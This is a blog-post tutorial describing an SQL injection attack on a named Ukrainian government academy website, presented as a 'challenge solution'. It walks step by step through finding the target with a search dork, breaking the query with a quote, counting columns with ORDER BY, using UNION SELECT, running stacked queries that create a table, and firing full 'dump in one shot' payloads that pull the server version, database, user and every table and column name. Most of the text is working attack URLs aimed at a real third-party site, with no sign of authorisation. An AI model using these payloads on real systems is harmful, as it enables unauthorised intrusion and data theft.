First of all we'll see my challenge rules/tasks.
Target is dlc2.academy.gov.ua and We've to print Cyber Name , Version , DB , User , Tables and Columns
Now Follow me :D ..
1. We'll find injection point... as you know .asp & .aspx extensions are common in MSSQLi..
So, Now time to use dorks :p
site:dlc2.academy.gov.ua inurl:.asp?id=
First Result : http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}
2. Now We'll Check it's vuln or not and try to balance the query..
Putting Single Quote
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}'
:D yeahhhhhh it's showing error .........
Now We'll try to balance the query by using comments..
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}-- - > No Error
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}'-- - > No Error
O.o no error while using single quote .. it means :D site is string based...
3. Now We'll find total number of columns...
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}' order by 5-- - > Error
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}' order by 3-- - > No Error
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}' order by 4-- - > No Error
:D so, total number of columns are 4..
4. Now We'll use Union Select..
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}' union select 1,2,3,4-- - > Error
:3 as always int problem...
Now we'll convert all into null..
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}' union select null,null,null,null-- - > No Error
-_- as what i said....
Now we'll convert one by one them in int..
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}' union select null,null,null,4-- - > No Error
and now It's showing Vuln Column "4" :D yeahhhhhhhhhhhhhhhh Hurrayyy <3 .........
5. Now time to DIOS...
For Detailed MSSQLi Visit : securityidiots.com
Now I'm going to use The DIOS of master Zen <3
;BEGIN%20DECLARE%20@data%20VARCHAR%288000%29,%20@counter%20int,%20@tblName%20VARCHAR%2850%29,%20@colNames%20VARCHAR%28100%29%20DECLARE%20@tmpTbl%20TABLE%20%28name%20VARCHAR%288000%29%20NOT%20NULL%29%20SET%20@counter%20=%201%20SET%20@data=%27a%27%2bchar%2810%29%2b%27Injected%20by%20Zen%20::%20%27%2b%27char%2810%29%27%2b@@version%2b%27Database%20::%20%27%2bdb_name%28%29%2bchar%2810%29%2bchar%2810%29%20SET%20@tblName%20=%20%27%27%20SET%20@colNames%20=%20%27%27%20WHILE%20@counter%3C=%28SELECT%20COUNT%28table_name%29%20FROM%20INFORMATION_SCHEMA.TABLES%29%20BEGIN%20SET%20@colNames%20=%20%27%27%20SELECT%20@tblName%20=%20table_name%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20TABLE_NAME%20NOT%20IN%20%28select%20name%20from%20@tmpTbl%29%20SELECT%20@colNames%20=%20@colNames%20%2b%27%20:%20%27%2bcolumn_name%20%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE_NAME%20=%20@tblName%20INSERT%20@tmpTbl%20VALUES%28@tblName%29%20SET%20@data=@data%2b%27Table%20:%20%27%2b@tblName%2bchar%2810%29%2b%27Columns%20:%27%2b@colNames%2bchar%2810%29%20SET%20@counter%20=%20@counter%20%2b%201%20END%20SELECT%20@data%20AS%20output%20INTO%20err_dios%20END--
:p Lemme do some changes ... Adding New Line + User
;BEGIN%20DECLARE%20@data%20VARCHAR%288000%29,%20@counter%20int,%20@tblName%20VARCHAR%2850%29,%20@colNames%20VARCHAR%28100%29%20DECLARE%20@tmpTbl%20TABLE%20%28name%20VARCHAR%288000%29%20NOT%20NULL%29%20SET%20@counter%20=%201%20SET%20@data=%2bchar%2810%29%2b%27Injected%20by%20D4RK%204NG31%27%2b%27<%27%2b%27br%27%2b%27>%27%2bchar%2810%29%2b%2bchar%2810%29%2b%27<%27%2b%27br%27%2b%27>%27%2b%27Version%20::%20%27%2b@@version%2bchar%2810%29%2b%27<%27%2b%27br%27%2b%27>%27%2b%27Database%20::%20%27%2bdb_name%28%29%2bchar%2810%29%2b%2bchar%2810%29%2b%27<%27%2b%27br%27%2b%27>%27%2b%27User%20::%20%27%2bcurrent_user%2b%27<%27%2b%27br%27%2b%27>%27%2b%2b%27<%27%2b%27br%27%2b%27>%27%2bchar%2810%29%2b%2bchar%2810%29%2bchar%2810%29%20SET%20@tblName%20=%20%27%27%20SET%20@colNames%20=%20%27%27%20WHILE%20@counter%3C=%28SELECT%20COUNT%28table_name%29%20FROM%20INFORMATION_SCHEMA.TABLES%29%20BEGIN%20SET%20@colNames%20=%20%27%27%20SELECT%20@tblName%20=%20table_name%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20TABLE_NAME%20NOT%20IN%20%28select%20name%20from%20@tmpTbl%29%20SELECT%20@colNames%20=%20@colNames%20%2b%27%20:%20%27%2bcolumn_name%20%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE_NAME%20=%20@tblName%20INSERT%20@tmpTbl%20VALUES%28@tblName%29%20SET%20@data=@data%2b%27Table%20:%20%27%2b@tblName%2b%27<%27%2b%27br%27%2b%27>%27%2b%27Columns%20:%27%2b@colNames%2b%27<%27%2b%27br%27%2b%27>%27%2b%27<%27%2b%27br%27%2b%27>%27%2bchar%2810%29%20SET%20@counter%20=%20@counter%20%2b%201%20END%20SELECT%20@data%20AS%20output%20INTO%20dark_challenge_solution%20END-- -
:D Done
Now time to Inject our DIOS
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}';BEGIN%20DECLARE%20@data%20VARCHAR%288000%29,%20@counter%20int,%20@tblName%20VARCHAR%2850%29,%20@colNames%20VARCHAR%28100%29%20DECLARE%20@tmpTbl%20TABLE%20%28name%20VARCHAR%288000%29%20NOT%20NULL%29%20SET%20@counter%20=%201%20SET%20@data=%2bchar%2810%29%2b%27Injected%20by%20D4RK%204NG31%27%2b%27<%27%2b%27br%27%2b%27>%27%2bchar%2810%29%2b%2bchar%2810%29%2b%27<%27%2b%27br%27%2b%27>%27%2b%27Version%20::%20%27%2b@@version%2bchar%2810%29%2b%27<%27%2b%27br%27%2b%27>%27%2b%27Database%20::%20%27%2bdb_name%28%29%2bchar%2810%29%2b%2bchar%2810%29%2b%27<%27%2b%27br%27%2b%27>%27%2b%27User%20::%20%27%2bcurrent_user%2b%27<%27%2b%27br%27%2b%27>%27%2b%2b%27<%27%2b%27br%27%2b%27>%27%2bchar%2810%29%2b%2bchar%2810%29%2bchar%2810%29%20SET%20@tblName%20=%20%27%27%20SET%20@colNames%20=%20%27%27%20WHILE%20@counter%3C=%28SELECT%20COUNT%28table_name%29%20FROM%20INFORMATION_SCHEMA.TABLES%29%20BEGIN%20SET%20@colNames%20=%20%27%27%20SELECT%20@tblName%20=%20table_name%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20TABLE_NAME%20NOT%20IN%20%28select%20name%20from%20@tmpTbl%29%20SELECT%20@colNames%20=%20@colNames%20%2b%27%20:%20%27%2bcolumn_name%20%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE_NAME%20=%20@tblName%20INSERT%20@tmpTbl%20VALUES%28@tblName%29%20SET%20@data=@data%2b%27Table%20:%20%27%2b@tblName%2b%27<%27%2b%27br%27%2b%27>%27%2b%27Columns%20:%27%2b@colNames%2b%27<%27%2b%27br%27%2b%27>%27%2b%27<%27%2b%27br%27%2b%27>%27%2bchar%2810%29%20SET%20@counter%20=%20@counter%20%2b%201%20END%20SELECT%20@data%20AS%20output%20INTO%20dark_challenge_solution%20END-- -
Injected ;)
Now we've to dump our DIOS..
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}' union select null,null,null,(select output from dark_challenge_solution)-- -
Picture here..
:o WTF??? DIOS not injected successfully >:o >:(
-_- No We've to Inject site with manual DIOS
for this I'll use this DIOS Thanks to Foysal Hossain ( Root X Force ) :D
'Injected by D4RK 4NG31'%2b'<'%2b'br>'%2b'<'%2b'br>'%2b'Version :: '%2b@@version%2b'<'%2b'br>'%2b%2b'Database :: '%2bdb_name()%2b%2b'<'%2b'br>'%2b'User :: '%2buser%2b%2b'<'%2b'br>'%2b%2b'<'%2b'br>'%2b(select+char(10)%2b'<'%2b'br>'%2btable_name%2b'::'%2bcolumn_name from information_schema.columns FOR+XML+PATH(''))
Putting DIOS in site and injecting..
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}' union select null,null,null,'Injected by D4RK 4NG31'%2b'<'%2b'br>'%2b'<'%2b'br>'%2b'Version :: '%2b@@version%2b'<'%2b'br>'%2b%2b'Database :: '%2bdb_name()%2b%2b'<'%2b'br>'%2b'User :: '%2buser%2b%2b'<'%2b'br>'%2b%2b'<'%2b'br>'%2b(select+char(10)%2b'<'%2b'br>'%2btable_name%2b'::'%2bcolumn_name from information_schema.columns FOR+XML+PATH(''))-- -
o.O why not showing...? :3 Ohhhh we've to put " and 1=0 " for error
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}' and 1=0 union select null,null,null,'Injected by D4RK 4NG31'%2b'<'%2b'br>'%2b'<'%2b'br>'%2b'Version :: '%2b@@version%2b'<'%2b'br>'%2b%2b'Database :: '%2bdb_name()%2b%2b'<'%2b'br>'%2b'User :: '%2buser%2b%2b'<'%2b'br>'%2b%2b'<'%2b'br>'%2b(select+char(10)%2b'<'%2b'br>'%2btable_name%2b'::'%2bcolumn_name from information_schema.columns FOR+XML+PATH(''))-- -
B| Done Site Injected Successfully...
Hope You Like My Tutorial of my Challenge Solution :D ... Thanks for watching
No comments:
Post a Comment